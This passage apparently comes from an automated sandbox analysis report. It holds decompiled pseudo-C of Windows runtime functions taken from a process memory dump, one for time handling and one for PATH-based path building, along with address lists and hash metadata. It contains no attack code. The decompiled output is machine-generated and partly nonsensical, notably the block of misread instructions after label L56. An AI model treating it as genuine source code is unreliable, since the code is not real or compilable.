                                                									L23:
                                                									 *(_t114 - 0x94) = _t109;
                                                									goto L26;
                                                								}
                                                								__eflags = _t104 - _t92;
                                                								if(__eflags > 0) {
                                                									goto L21;
                                                								}
                                                								if(__eflags == 0) {
                                                									goto L22;
                                                								}
                                                								goto L23;
                                                							}
                                                							goto L15;
                                                						}
                                                					}
                                                					__eflags = _t109;
                                                					if(_t109 >= 0) {
                                                						goto L31;
                                                					}
                                                					__eflags = _t109 - 0x80000005;
                                                					if(_t109 != 0x80000005) {
                                                						goto L31;
                                                					}
                                                					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                                					_t38 = _t95 - 1; // -129
                                                					_t99 = _t38;
                                                					goto L34;
                                                				}
                                                				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                					__eflags = __edx - 0x65;
                                                					if(__edx != 0x65) {
                                                						goto L2;
                                                					}
                                                					goto L6;
                                                				}
                                                				L2:
                                                				_push( *((intOrPtr*)(_t114 + 8)));
                                                				_push(_t106);
                                                				if(E00ADA890() != 0) {
                                                					goto L6;
                                                				}
                                                				goto L3;
                                                			}

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID: _vswprintf_s
                                                • String ID:
                                                • API String ID: 677850445-0
                                                • Opcode ID: e3e7a1362bcc9e10633d212e73af2abba5d99fd9bb8c8948b1cc6222728acff7
                                                • Instruction ID: cd523e642eec2f7e471a1e4c3cb6f987b25509f98af985f2b8e0c738cc3c99fa
                                                • Opcode Fuzzy Hash: e3e7a1362bcc9e10633d212e73af2abba5d99fd9bb8c8948b1cc6222728acff7
                                                • Instruction Fuzzy Hash: AF51C275E102598ADF31CFA8C985BBFBBF0AF08710F2042ADE959AB281D7744D419B90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 76%
                                                			E00ABB944(signed int* __ecx, char __edx) {
                                                				signed int _v8;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				char _v28;
                                                				signed int _v32;
                                                				char _v36;
                                                				signed int _v40;
                                                				intOrPtr _v44;
                                                				signed int* _v48;
                                                				signed int _v52;
                                                				signed int _v56;
                                                				intOrPtr _v60;
                                                				intOrPtr _v64;
                                                				intOrPtr _v68;
                                                				intOrPtr _v72;
                                                				intOrPtr _v76;
                                                				char _v77;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				intOrPtr* _t65;
                                                				intOrPtr _t67;
                                                				intOrPtr _t68;
                                                				char* _t73;
                                                				intOrPtr _t77;
                                                				intOrPtr _t78;
                                                				signed int _t82;
                                                				intOrPtr _t83;
                                                				void* _t87;
                                                				char _t88;
                                                				intOrPtr* _t89;
                                                				intOrPtr _t91;
                                                				void* _t97;
                                                				intOrPtr _t100;
                                                				void* _t102;
                                                				void* _t107;
                                                				signed int _t108;
                                                				intOrPtr* _t112;
                                                				void* _t113;
                                                				intOrPtr* _t114;
                                                				intOrPtr _t115;
                                                				intOrPtr _t116;
                                                				intOrPtr _t117;
                                                				signed int _t118;
                                                				void* _t130;
                                                
                                                				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                                				_v8 =  *0xb8d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                                				_t112 = __ecx;
                                                				_v77 = __edx;
                                                				_v48 = __ecx;
                                                				_v28 = 0;
                                                				_t5 = _t112 + 0xc; // 0x575651ff
                                                				_t105 =  *_t5;
                                                				_v20 = 0;
                                                				_v16 = 0;
                                                				if(_t105 == 0) {
                                                					_t50 = _t112 + 4; // 0x5de58b5b
                                                					_t60 =  *__ecx |  *_t50;
                                                					if(( *__ecx |  *_t50) != 0) {
                                                						 *__ecx = 0;
                                                						__ecx[1] = 0;
                                                						if(E00AB7D50() != 0) {
                                                							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                						} else {
                                                							_t65 = 0x7ffe0386;
                                                						}
                                                						if( *_t65 != 0) {
                                                							E00B68CD6(_t112);
                                                						}
                                                						_push(0);
                                                						_t52 = _t112 + 0x10; // 0x778df98b
                                                						_push( *_t52);
                                                						_t60 = E00AD9E20();
                                                					}
                                                					L20:
                                                					_pop(_t107);
                                                					_pop(_t113);
                                                					_pop(_t87);
                                                					return L00ADB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                                				}
                                                				_t8 = _t112 + 8; // 0x8b000cc2
                                                				_t67 =  *_t8;
                                                				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                                				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                                				_t108 =  *(_t67 + 0x14);
                                                				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                                				_t105 = 0x2710;
                                                				asm("sbb eax, edi");
                                                				_v44 = _t88;
                                                				_v52 = _t108;
                                                				_t60 = L00ADCE00(_t97, _t68, 0x2710, 0);
                                                				_v56 = _t60;
                                                				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                                					L3:
                                                					 *(_t112 + 0x44) = _t60;
                                                					_t105 = _t60 * 0x2710 >> 0x20;
                                                					 *_t112 = _t88;
                                                					 *(_t112 + 4) = _t108;
                                                					_v20 = _t60 * 0x2710;
                                                					_v16 = _t60 * 0x2710 >> 0x20;
                                                					if(_v77 != 0) {
                                                						L16:
                                                						_v36 = _t88;
                                                						_v32 = _t108;
                                                						if(E00AB7D50() != 0) {
                                                							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                						} else {
                                                							_t73 = 0x7ffe0386;
                                                						}
                                                						if( *_t73 != 0) {
                                                							_t105 = _v40;
                                                							L00B68F6A(_t112, _v40, _t88, _t108);
                                                						}
                                                						_push( &_v28);
                                                						_push(0);
                                                						_push( &_v36);
                                                						_t48 = _t112 + 0x10; // 0x778df98b
                                                						_push( *_t48);
                                                						_t60 = L00ADAF60();
                                                						goto L20;
                                                					} else {
                                                						_t89 = 0x7ffe03b0;
                                                						do {
                                                							_t114 = 0x7ffe0010;
                                                							do {
                                                								_t77 =  *0xb88628; // 0x0
                                                								_v68 = _t77;
                                                								_t78 =  *0xb8862c; // 0x0
                                                								_v64 = _t78;
                                                								_v72 =  *_t89;
                                                								_v76 =  *((intOrPtr*)(_t89 + 4));
                                                								while(1) {
                                                									_t105 =  *0x7ffe000c;
                                                									_t100 =  *0x7ffe0008;
                                                									if(_t105 ==  *_t114) {
                                                										goto L8;
                                                									}
                                                									asm("pause");
                                                								}
                                                								L8:
                                                								_t89 = 0x7ffe03b0;
                                                								_t115 =  *0x7ffe03b0;
                                                								_t82 =  *0x7FFE03B4;
                                                								_v60 = _t115;
                                                								_t114 = 0x7ffe0010;
                                                								_v56 = _t82;
                                                							} while (_v72 != _t115 || _v76 != _t82);
                                                							_t83 =  *0xb88628; // 0x0
                                                							_t116 =  *0xb8862c; // 0x0
                                                							_v76 = _t116;
                                                							_t117 = _v68;
                                                						} while (_t117 != _t83 || _v64 != _v76);
                                                						asm("sbb edx, [esp+0x24]");
                                                						_t102 = _t100 - _v60 - _t117;
                                                						_t112 = _v48;
                                                						_t91 = _v44;
                                                						asm("sbb edx, eax");
                                                						_t130 = _t105 - _v52;
                                                						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                                							_t88 = _t102 - _t91;
                                                							asm("sbb edx, edi");
                                                							_t108 = _t105;
                                                						} else {
                                                							_t88 = 0;
                                                							_t108 = 0;
                                                						}
                                                						goto L16;
                                                					}
                                                				} else {
                                                					if( *(_t112 + 0x44) == _t60) {
                                                						goto L20;
                                                					}
                                                					goto L3;
                                                				}
                                                			}
                                                0x00abbac3
                                                0x00abbac6
                                                0x00000000
                                                0x00abb9dd
                                                0x00abb9dd
                                                0x00abb9e7
                                                0x00abb9e7
                                                0x00abb9ec
                                                0x00abb9ec
                                                0x00abb9f1
                                                0x00abb9f5
                                                0x00abb9fa
                                                0x00abba00
                                                0x00abba0c
                                                0x00abba10
                                                0x00abba10
                                                0x00abba12
                                                0x00abba18
                                                0x00000000
                                                0x00000000
                                                0x00abbb26
                                                0x00abbb26
                                                0x00abba1e
                                                0x00abba1e
                                                0x00abba23
                                                0x00abba25
                                                0x00abba2c
                                                0x00abba30
                                                0x00abba35
                                                0x00abba35
                                                0x00abba41
                                                0x00abba46
                                                0x00abba4c
                                                0x00abba50
                                                0x00abba54
                                                0x00abba6a
                                                0x00abba6e
                                                0x00abba70
                                                0x00abba74
                                                0x00abba78
                                                0x00abba7a
                                                0x00abba7c
                                                0x00abba8e
                                                0x00abba90
                                                0x00abba92
                                                0x00abbb14
                                                0x00abbb14
                                                0x00abbb16
                                                0x00abbb16
                                                0x00000000
                                                0x00abba7c
                                                0x00abbb0a
                                                0x00abbb0d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00abbb0f

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00ABB9A5
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID:
                                                • API String ID: 885266447-0
                                                • Opcode ID: 66aefe4631f0887f8cbf9373d7bd1e3d4a02c6dfcb91d6f3a197b85d699655d0
                                                • Instruction ID: 3a64c53f6b461df63e75d6b39453a805e26cf100320b29b17b3b42591713d3b9
                                                • Opcode Fuzzy Hash: 66aefe4631f0887f8cbf9373d7bd1e3d4a02c6dfcb91d6f3a197b85d699655d0
                                                • Instruction Fuzzy Hash: 66514771A18301CFC720CF28C58096ABBE9FB88740F64496EF59587356DBB1EC44CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 81%
                                                			E00AC2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
                                                				signed int _v8;
                                                				signed int _v16;
                                                				unsigned int _v24;
                                                				void* _v28;
                                                				signed int _v32;
                                                				unsigned int _v36;
                                                				signed int _v37;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				signed int _v48;
                                                				signed int _v52;
                                                				signed int _v56;
                                                				intOrPtr _v60;
                                                				signed int _v64;
                                                				signed int _v68;
                                                				signed int _v72;
                                                				signed int _v76;
                                                				signed int _v80;
                                                				signed int _t244;
                                                				signed int _t248;
                                                				void* _t249;
                                                				void* _t251;
                                                				signed int _t258;
                                                				signed int _t260;
                                                				intOrPtr _t262;
                                                				signed int _t265;
                                                				signed int _t272;
                                                				signed int _t275;
                                                				signed int _t283;
                                                				intOrPtr _t289;
                                                				signed int _t291;
                                                				signed int _t293;
                                                				void* _t294;
                                                				signed int _t295;
                                                				signed int _t296;
                                                				unsigned int _t299;
                                                				signed int _t303;
                                                				intOrPtr* _t304;
                                                				signed int _t306;
                                                				signed int _t310;
                                                				intOrPtr _t322;
                                                				signed int _t331;
                                                				signed int _t333;
                                                				signed int _t334;
                                                				signed int _t338;
                                                				signed int _t339;
                                                				signed int _t341;
                                                				signed int _t343;
                                                				signed int _t346;
                                                				void* _t347;
                                                				void* _t349;
                                                
                                                				_t343 = _t346;
                                                				_t347 = _t346 - 0x4c;
                                                				_v8 =  *0xb8d360 ^ _t343;
                                                				_push(__ebx);
                                                				_push(__esi);
                                                				_push(__edi);
                                                				_t338 = 0xb8b2e8;
                                                				_v56 = _a4;
                                                				_v48 = __edx;
                                                				_v60 = __ecx;
                                                				_t299 = 0;
                                                				_v80 = 0;
                                                				asm("movsd");
                                                				_v64 = 0;
                                                				_v76 = 0;
                                                				_v72 = 0;
                                                				asm("movsd");
                                                				_v44 = 0;
                                                				_v52 = 0;
                                                				_v68 = 0;
                                                				asm("movsd");
                                                				_v32 = 0;
                                                				_v36 = 0;
                                                				asm("movsd");
                                                				_v16 = 0;
                                                				_t289 = 0x48;
                                                				_t320 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
                                                				_t331 = 0;
                                                				_v37 = _t320;
                                                				if(_v48 <= 0) {
                                                					L16:
                                                					_t45 = _t289 - 0x48; // 0x0
                                                					__eflags = _t45 - 0xfffe;
                                                					if(_t45 > 0xfffe) {
                                                						_t339 = 0xc0000106;
                                                						goto L32;
                                                					} else {
                                                						_t338 = L00AB4620(_t299,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t289);
                                                						_v52 = _t338;
                                                						__eflags = _t338;
                                                						if(_t338 == 0) {
                                                							_t339 = 0xc0000017;
                                                							goto L32;
                                                						} else {
                                                							 *(_t338 + 0x44) =  *(_t338 + 0x44) & 0x00000000;
                                                							_t50 = _t338 + 0x48; // 0x48
                                                							_t333 = _t50;
                                                							_t320 = _v32;
                                                							 *((intOrPtr*)(_t338 + 0x3c)) = _t289;
                                                							_t291 = 0;
                                                							 *((short*)(_t338 + 0x30)) = _v48;
                                                							__eflags = _t320;
                                                							if(_t320 != 0) {
                                                								 *(_t338 + 0x18) = _t333;
                                                								__eflags = _t320 - 0xb88478;
                                                								 *_t338 = ((0 | _t320 == 0x00b88478) - 0x00000001 & 0xfffffffb) + 7;
                                                								E00ADF3E0(_t333,  *((intOrPtr*)(_t320 + 4)),  *_t320 & 0x0000ffff);
                                                								_t320 = _v32;
                                                								_t347 = _t347 + 0xc;
                                                								_t291 = 1;
                                                								__eflags = _a8;
                                                								_t333 = _t333 + (( *_t320 & 0x0000ffff) >> 1) * 2;
                                                								if(_a8 != 0) {
                                                									_t283 = E00B239F2(_t333);
                                                									_t320 = _v32;
                                                									_t333 = _t283;
                                                								}
                                                							}
                                                							_t303 = 0;
                                                							_v16 = 0;
                                                							__eflags = _v48;
                                                							if(_v48 <= 0) {
                                                								L31:
                                                								_t339 = _v68;
                                                								__eflags = 0;
                                                								 *((short*)(_t333 - 2)) = 0;
                                                								goto L32;
                                                							} else {
                                                								_t293 = _t338 + _t291 * 4;
                                                								_v56 = _t293;
                                                								do {
                                                									__eflags = _t320;
                                                									if(_t320 != 0) {
                                                										_t244 =  *(_v60 + _t303 * 4);
                                                										__eflags = _t244;
                                                										if(_t244 == 0) {
                                                											goto L30;
                                                										} else {
                                                											__eflags = _t244 == 5;
                                                											if(_t244 == 5) {
                                                												goto L30;
                                                											} else {
                                                												goto L22;
                                                											}
                                                										}
                                                									} else {
                                                										L22:
                                                										 *_t293 =  *(_v60 + _t303 * 4);
                                                										 *(_t293 + 0x18) = _t333;
                                                										_t248 =  *(_v60 + _t303 * 4);
                                                										__eflags = _t248 - 8;
                                                										if(_t248 > 8) {
                                                											goto L56;
                                                										} else {
                                                											switch( *((intOrPtr*)(_t248 * 4 +  &M00AC2959))) {
                                                												case 0:
                                                													__ax =  *0xb88488;
                                                													__eflags = __ax;
                                                													if(__ax == 0) {
                                                														goto L29;
                                                													} else {
                                                														__ax & 0x0000ffff = E00ADF3E0(__edi,  *0xb8848c, __ax & 0x0000ffff);
                                                														__eax =  *0xb88488 & 0x0000ffff;
                                                														goto L26;
                                                													}
                                                													goto L108;
                                                												case 1:
                                                													L45:
                                                													E00ADF3E0(_t333, _v80, _v64);
                                                													_t278 = _v64;
                                                													goto L26;
                                                												case 2:
                                                													 *0xb88480 & 0x0000ffff = E00ADF3E0(__edi,  *0xb88484,  *0xb88480 & 0x0000ffff);
                                                													__eax =  *0xb88480 & 0x0000ffff;
                                                													__eax = ( *0xb88480 & 0x0000ffff) >> 1;
                                                													__edi = __edi + __eax * 2;
                                                													goto L28;
                                                												case 3:
                                                													__eax = _v44;
                                                													__eflags = __eax;
                                                													if(__eax == 0) {
                                                														goto L29;
                                                													} else {
                                                														__esi = __eax + __eax;
                                                														__eax = E00ADF3E0(__edi, _v72, __esi);
                                                														__edi = __edi + __esi;
                                                														__esi = _v52;
                                                														goto L27;
                                                													}
                                                													goto L108;
                                                												case 4:
                                                													_push(0x2e);
                                                													_pop(__eax);
                                                													 *(__esi + 0x44) = __edi;
                                                													 *__edi = __ax;
                                                													__edi = __edi + 4;
                                                													_push(0x3b);
                                                													_pop(__eax);
                                                													 *(__edi - 2) = __ax;
                                                													goto L29;
                                                												case 5:
                                                													__eflags = _v36;
                                                													if(_v36 == 0) {
                                                														goto L45;
                                                													} else {
                                                														E00ADF3E0(_t333, _v76, _v36);
                                                														_t278 = _v36;
                                                													}
                                                													L26:
                                                													_t347 = _t347 + 0xc;
                                                													_t333 = _t333 + (_t278 >> 1) * 2 + 2;
                                                													__eflags = _t333;
                                                													L27:
                                                													_push(0x3b);
                                                													_pop(_t280);
                                                													 *((short*)(_t333 - 2)) = _t280;
                                                													goto L28;
                                                												case 6:
                                                													__ebx =  *0xb8575c;
                                                													__eflags = __ebx - 0xb8575c;
                                                													if(__ebx != 0xb8575c) {
                                                														_push(0x3b);
                                                														_pop(__esi);
                                                														do {
                                                															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                                															E00ADF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                                															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                                															__edi = __edi + __eax * 2;
                                                															__edi = __edi + 2;
                                                															 *(__edi - 2) = __si;
                                                															__ebx =  *__ebx;
                                                															__eflags = __ebx - 0xb8575c;
                                                														} while (__ebx != 0xb8575c);
                                                														__esi = _v52;
                                                														__ecx = _v16;
                                                														__edx = _v32;
                                                													}
                                                													__ebx = _v56;
                                                													goto L29;
                                                												case 7:
                                                													 *0xb88478 & 0x0000ffff = E00ADF3E0(__edi,  *0xb8847c,  *0xb88478 & 0x0000ffff);
                                                													__eax =  *0xb88478 & 0x0000ffff;
                                                													__eax = ( *0xb88478 & 0x0000ffff) >> 1;
                                                													__eflags = _a8;
                                                													__edi = __edi + __eax * 2;
                                                													if(_a8 != 0) {
                                                														__ecx = __edi;
                                                														__eax = E00B239F2(__ecx);
                                                														__edi = __eax;
                                                													}
                                                													goto L28;
                                                												case 8:
                                                													__eax = 0;
                                                													 *(__edi - 2) = __ax;
                                                													 *0xb86e58 & 0x0000ffff = E00ADF3E0(__edi,  *0xb86e5c,  *0xb86e58 & 0x0000ffff);
                                                													 *(__esi + 0x38) = __edi;
                                                													__eax =  *0xb86e58 & 0x0000ffff;
                                                													__eax = ( *0xb86e58 & 0x0000ffff) >> 1;
                                                													__edi = __edi + __eax * 2;
                                                													__edi = __edi + 2;
                                                													L28:
                                                													_t303 = _v16;
                                                													_t320 = _v32;
                                                													L29:
                                                													_t293 = _t293 + 4;
                                                													__eflags = _t293;
                                                													_v56 = _t293;
                                                													goto L30;
                                                											}
                                                										}
                                                									}
                                                									goto L108;
                                                									L30:
                                                									_t303 = _t303 + 1;
                                                									_v16 = _t303;
                                                									__eflags = _t303 - _v48;
                                                								} while (_t303 < _v48);
                                                								goto L31;
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					while(1) {
                                                						L1:
                                                						_t248 =  *(_v60 + _t331 * 4);
                                                						if(_t248 > 8) {
                                                							break;
                                                						}
                                                						switch( *((intOrPtr*)(_t248 * 4 +  &M00AC2935))) {
                                                							case 0:
                                                								__ax =  *0xb88488;
                                                								__eflags = __ax;
                                                								if(__ax != 0) {
                                                									__eax = __ax & 0x0000ffff;
                                                									__ebx = __ebx + 2;
                                                									__eflags = __ebx;
                                                									goto L53;
                                                								}
                                                								goto L14;
                                                							case 1:
                                                								L44:
                                                								_t320 =  &_v64;
                                                								_v80 = E00AC2E3E(0,  &_v64);
                                                								_t289 = _t289 + _v64 + 2;
                                                								goto L13;
                                                							case 2:
                                                								__eax =  *0xb88480 & 0x0000ffff;
                                                								__ebx = __ebx + __eax;
                                                								__eflags = __dl;
                                                								if(__dl != 0) {
                                                									__eax = 0xb88480;
                                                									goto L80;
                                                								}
                                                								goto L14;
                                                							case 3:
                                                								__eax = E00AAEEF0(0xb879a0);
                                                								__eax =  &_v44;
                                                								_push(__eax);
                                                								_push(0);
                                                								_push(0);
                                                								_push(4);
                                                								_push(L"PATH");
                                                								_push(0);
                                                								L57();
                                                								__esi = __eax;
                                                								_v68 = __esi;
                                                								__eflags = __esi - 0xc0000023;
                                                								if(__esi != 0xc0000023) {
                                                									L10:
                                                									__eax = E00AAEB70(__ecx, 0xb879a0);
                                                									__eflags = __esi - 0xc0000100;
                                                									if(__esi == 0xc0000100) {
                                                										_v44 = _v44 & 0x00000000;
                                                										__eax = 0;
                                                										_v68 = 0;
                                                										goto L13;
                                                									} else {
                                                										__eflags = __esi;
                                                										if(__esi < 0) {
                                                											L32:
                                                											_t222 = _v72;
                                                											__eflags = _t222;
                                                											if(_t222 != 0) {
                                                												L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t222);
                                                											}
                                                											_t223 = _v52;
                                                											__eflags = _t223;
                                                											if(_t223 != 0) {
                                                												__eflags = _t339;
                                                												if(_t339 < 0) {
                                                													L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t223);
                                                													_t223 = 0;
                                                												}
                                                											}
                                                											goto L36;
                                                										} else {
                                                											__eax = _v44;
                                                											__ebx = __ebx + __eax * 2;
                                                											__ebx = __ebx + 2;
                                                											__eflags = __ebx;
                                                											L13:
                                                											_t299 = _v36;
                                                											goto L14;
                                                										}
                                                									}
                                                								} else {
                                                									__eax = _v44;
                                                									__ecx =  *0xb87b9c; // 0x0
                                                									_v44 + _v44 =  *[fs:0x30];
                                                									__ecx = __ecx + 0x180000;
                                                									__eax = L00AB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                                									_v72 = __eax;
                                                									__eflags = __eax;
                                                									if(__eax == 0) {
                                                										__eax = E00AAEB70(__ecx, 0xb879a0);
                                                										__eax = _v52;
                                                										L36:
                                                										_pop(_t332);
                                                										_pop(_t340);
                                                										__eflags = _v8 ^ _t343;
                                                										_pop(_t290);
                                                										return L00ADB640(_t223, _t290, _v8 ^ _t343, _t320, _t332, _t340);
                                                									} else {
                                                										__ecx =  &_v44;
                                                										_push(__ecx);
                                                										_push(_v44);
                                                										_push(__eax);
                                                										_push(4);
                                                										_push(L"PATH");
                                                										_push(0);
                                                										L57();
                                                										__esi = __eax;
                                                										_v68 = __eax;
                                                										goto L10;
                                                									}
                                                								}
                                                								goto L108;
                                                							case 4:
                                                								__ebx = __ebx + 4;
                                                								goto L14;
                                                							case 5:
                                                								_t285 = _v56;
                                                								if(_v56 != 0) {
                                                									_t320 =  &_v36;
                                                									_t287 = E00AC2E3E(_t285,  &_v36);
                                                									_t299 = _v36;
                                                									_v76 = _t287;
                                                								}
                                                								if(_t299 == 0) {
                                                									goto L44;
                                                								} else {
                                                									_t289 = _t289 + 2 + _t299;
                                                								}
                                                								goto L14;
                                                							case 6:
                                                								__eax =  *0xb85764 & 0x0000ffff;
                                                								goto L53;
                                                							case 7:
                                                								__eax =  *0xb88478 & 0x0000ffff;
                                                								__ebx = __ebx + __eax;
                                                								__eflags = _a8;
                                                								if(_a8 != 0) {
                                                									__ebx = __ebx + 0x16;
                                                									__ebx = __ebx + __eax;
                                                								}
                                                								__eflags = __dl;
                                                								if(__dl != 0) {
                                                									__eax = 0xb88478;
                                                									L80:
                                                									_v32 = __eax;
                                                								}
                                                								goto L14;
                                                							case 8:
                                                								__eax =  *0xb86e58 & 0x0000ffff;
                                                								__eax = ( *0xb86e58 & 0x0000ffff) + 2;
                                                								L53:
                                                								__ebx = __ebx + __eax;
                                                								L14:
                                                								_t331 = _t331 + 1;
                                                								if(_t331 >= _v48) {
                                                									goto L16;
                                                								} else {
                                                									_t320 = _v37;
                                                									goto L1;
                                                								}
                                                								goto L108;
                                                						}
                                                					}
                                                					L56:
                                                					_t304 = 0x25;
                                                					asm("int 0x29");
                                                					asm("out 0x28, al");
                                                					asm("lodsb");
                                                					 *((intOrPtr*)(_t338 + 0x28)) =  *((intOrPtr*)(_t338 + 0x28)) + _t248;
                                                					asm("lodsb");
                                                					_t249 = _t248 + _t248;
                                                					asm("daa");
                                                					asm("lodsb");
                                                					 *_t338 =  *_t338 + _t304;
                                                					asm("es lodsb");
                                                					 *((intOrPtr*)(_t338 + 0x28)) =  *((intOrPtr*)(_t338 + 0x28)) + _t249;
                                                					asm("lodsb");
                                                					 *0x1f00ac26 =  *0x1f00ac26 + _t249;
                                                					_pop(_t294);
                                                					_t251 = _t347;
                                                					_t349 = 0;
                                                					 *((intOrPtr*)(_t251 + _t251 + 0xb05b35)) =  *((intOrPtr*)(_t251 + _t251 + 0xb05b35)) - _t304;
                                                					asm("lodsb");
                                                					 *((intOrPtr*)(_t251 - 0x9ff53d8)) =  *((intOrPtr*)(_t251 - 0x9ff53d8));
                                                					asm("daa");
                                                					asm("lodsb");
                                                					 *_t338 =  *_t338 + _t294;
                                                					 *((intOrPtr*)(_t251 + _t251 + 0xac284e)) =  *((intOrPtr*)(_t251 + _t251 + 0xac284e)) - _t304 +  *_t304;
                                                					asm("daa");
                                                					asm("lodsb");
                                                					_pop(_t295);
                                                					asm("lodsb");
                                                					 *((intOrPtr*)(0 + _t295 * 2)) =  *((intOrPtr*)(0 + _t295 * 2)) + _t320;
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					_push(0x20);
                                                					_push(0xb6ff00);
                                                					E00AED08C(_t295, _t333, _t338);
                                                					_v44 =  *[fs:0x18];
                                                					_t334 = 0;
                                                					 *_a24 = 0;
                                                					_t296 = _a12;
                                                					__eflags = _t296;
                                                					if(_t296 == 0) {
                                                						_t258 = 0xc0000100;
                                                					} else {
                                                						_v8 = 0;
                                                						_t341 = 0xc0000100;
                                                						_v52 = 0xc0000100;
                                                						_t260 = 4;
                                                						while(1) {
                                                							_v40 = _t260;
                                                							__eflags = _t260;
                                                							if(_t260 == 0) {
                                                								break;
                                                							}
                                                							_t310 = _t260 * 0xc;
                                                							_v48 = _t310;
                                                							__eflags = _t296 -  *((intOrPtr*)(_t310 + 0xa71664));
                                                							if(__eflags <= 0) {
                                                								if(__eflags == 0) {
                                                									_t275 = E00ADE5C0(_a8,  *((intOrPtr*)(_t310 + 0xa71668)), _t296);
                                                									_t349 = _t349 + 0xc;
                                                									__eflags = _t275;
                                                									if(__eflags == 0) {
                                                										_t341 = E00B151BE(_t296,  *((intOrPtr*)(_v48 + 0xa7166c)), _a16, _t334, _t341, __eflags, _a20, _a24);
                                                										_v52 = _t341;
                                                										break;
                                                									} else {
                                                										_t260 = _v40;
                                                										goto L62;
                                                									}
                                                									goto L70;
                                                								} else {
                                                									L62:
                                                									_t260 = _t260 - 1;
                                                									continue;
                                                								}
                                                							}
                                                							break;
                                                						}
                                                						_v32 = _t341;
                                                						__eflags = _t341;
                                                						if(_t341 < 0) {
                                                							__eflags = _t341 - 0xc0000100;
                                                							if(_t341 == 0xc0000100) {
                                                								_t306 = _a4;
                                                								__eflags = _t306;
                                                								if(_t306 != 0) {
                                                									_v36 = _t306;
                                                									__eflags =  *_t306 - _t334;
                                                									if( *_t306 == _t334) {
                                                										_t341 = 0xc0000100;
                                                										goto L76;
                                                									} else {
                                                										_t322 =  *((intOrPtr*)(_v44 + 0x30));
                                                										_t262 =  *((intOrPtr*)(_t322 + 0x10));
                                                										__eflags =  *((intOrPtr*)(_t262 + 0x48)) - _t306;
                                                										if( *((intOrPtr*)(_t262 + 0x48)) == _t306) {
                                                											__eflags =  *(_t322 + 0x1c);
                                                											if( *(_t322 + 0x1c) == 0) {
                                                												L106:
                                                												_t341 = E00AC2AE4( &_v36, _a8, _t296, _a16, _a20, _a24);
                                                												_v32 = _t341;
                                                												__eflags = _t341 - 0xc0000100;
                                                												if(_t341 != 0xc0000100) {
                                                													goto L69;
                                                												} else {
                                                													_t334 = 1;
                                                													_t306 = _v36;
                                                													goto L75;
                                                												}
                                                											} else {
                                                												_t265 = L00AA6600( *(_t322 + 0x1c));
                                                												__eflags = _t265;
                                                												if(_t265 != 0) {
                                                													goto L106;
                                                												} else {
                                                													_t306 = _a4;
                                                													goto L75;
                                                												}
                                                											}
                                                										} else {
                                                											L75:
                                                											_t341 = E00AC2C50(_t306, _a8, _t296, _a16, _a20, _a24, _t334);
                                                											L76:
                                                											_v32 = _t341;
                                                											goto L69;
                                                										}
                                                									}
                                                									goto L108;
                                                								} else {
                                                									E00AAEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                									_v8 = 1;
                                                									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                                									_t341 = _a24;
                                                									_t272 = E00AC2AE4( &_v36, _a8, _t296, _a16, _a20, _t341);
                                                									_v32 = _t272;
                                                									__eflags = _t272 - 0xc0000100;
                                                									if(_t272 == 0xc0000100) {
                                                										_v32 = E00AC2C50(_v36, _a8, _t296, _a16, _a20, _t341, 1);
                                                									}
                                                									_v8 = _t334;
                                                									E00AC2ACB();
                                                								}
                                                							}
                                                						}
                                                						L69:
                                                						_v8 = 0xfffffffe;
                                                						_t258 = _t341;
                                                					}
                                                					L70:
                                                					return E00AED0D1(_t258);
                                                				}
                                                				L108:
                                                			}






















































                                                0x00000000
                                                0x00ac2756
                                                0x00ac2750
                                                0x00000000
                                                0x00ac2794
                                                0x00ac2794
